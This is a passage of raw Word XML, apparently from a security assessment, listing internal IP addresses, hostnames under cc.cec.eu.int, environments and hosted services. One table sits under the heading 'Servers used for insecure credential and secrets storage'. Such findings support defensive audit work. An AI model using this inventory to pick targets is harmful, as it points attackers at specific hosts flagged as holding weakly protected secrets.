                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.181.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6AA1E58A" w14:textId="24CBF1D8" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03815.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5134DFB1" w14:textId="3F09A829"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51B9373D" w14:textId="70850BAD" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1460" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="12D04136" w14:textId="3B1DE36F" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="71F02DB4" w14:textId="1B254BDD" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="77E3F992" w14:textId="0A91BF4C" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="29CAC5FA" w14:textId="6CB53AC9" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7CA96F0A" w14:textId="7F9D138C"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252D190A" w14:textId="4803DCAB"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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0DEF5EFF" w14:textId="57355ADF" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="7F57B154" w14:textId="175EC4CA" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5BF87A79" w14:textId="60572110" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.141.60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="26164568" w14:textId="497C538E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03379.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5FA22959" w14:textId="419E4461"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2F0D9BCF" w14:textId="6FB21640"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tcPr>
          <w:p w14:paraId="55EB027C" w14:textId="1E0C8D5D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="0053C36F" w14:textId="665F94F9" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3F7EBE43" w14:textId="3D28E701" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.139.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="623ADEC5" w14:textId="6E3972C4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd11318.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4083FA29" w14:textId="2CF4BD45"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1D4D5D4B" w14:textId="440DC17B"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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="13232731" w14:textId="5EC4551D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="686F8C47" w14:textId="4F451411" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="04EF1071" w14:textId="0847BA0B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.130.41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="287D2AB4" w14:textId="49066B76" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02925.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5E45615E" w14:textId="165558E0"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0451AF54" w14:textId="633F3608"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tcPr>
          <w:p w14:paraId="015171D8" w14:textId="0B08B4A4" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5487D057" w14:textId="64878D91" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="294678C9" w14:textId="191B83A2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.138.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1323" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1A656519" w14:textId="3A5F1962" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03375.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="486" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="102130DC" w14:textId="6D5D9A51" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="864" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="78EC7E2A" w14:textId="3AF60DD6" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1460" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="23CB37B6" w14:textId="0C7DA0B0" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="001236CA">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.AUTHSERV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="034F01A9" w14:textId="549F2987" w:rsidR="00CD31B9" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00AC0692">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Ref212824035"/>
      <w:bookmarkStart w:id="244" w:name="_Toc213253584"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Servers used for insecure credential and secrets storage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="243"/>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1388"/>
        <w:gridCol w:w="2173"/>
        <w:gridCol w:w="784"/>
        <w:gridCol w:w="1377"/>
        <w:gridCol w:w="3024"/>
      </w:tblGrid>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="1BE49C14" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6AEFF0E5"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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F97EB3"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FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B7E5618"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DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28B9B1FC"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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76EDCD29"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Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="02A6AFDB" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53539F88" w14:textId="4F1C78F7" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.179.158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A1C0D9B" w14:textId="0C6DB150" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03800.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3142CE0C" w14:textId="6B59998B"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6AE77AEC" w14:textId="0E43F74D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4D63A466" w14:textId="3598469D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="14D9FE3C" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FB50D05" w14:textId="17A01C06" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.181.163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6FC155F4" w14:textId="1BD21150" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03823.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="670B5A04" w14:textId="3EFFD767"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39892658" w14:textId="68890CC0" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D90BE1B" w14:textId="5F99FBC3" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="35EA11C3" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09FAF0E8" w14:textId="3EE85880" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.142.217</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7AF8B517" w14:textId="4A18B4E2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd01904.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32483821" w14:textId="22182D27"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179E1EBC" w14:textId="675E6A12" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="280DD67C" w14:textId="34E34EC5" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
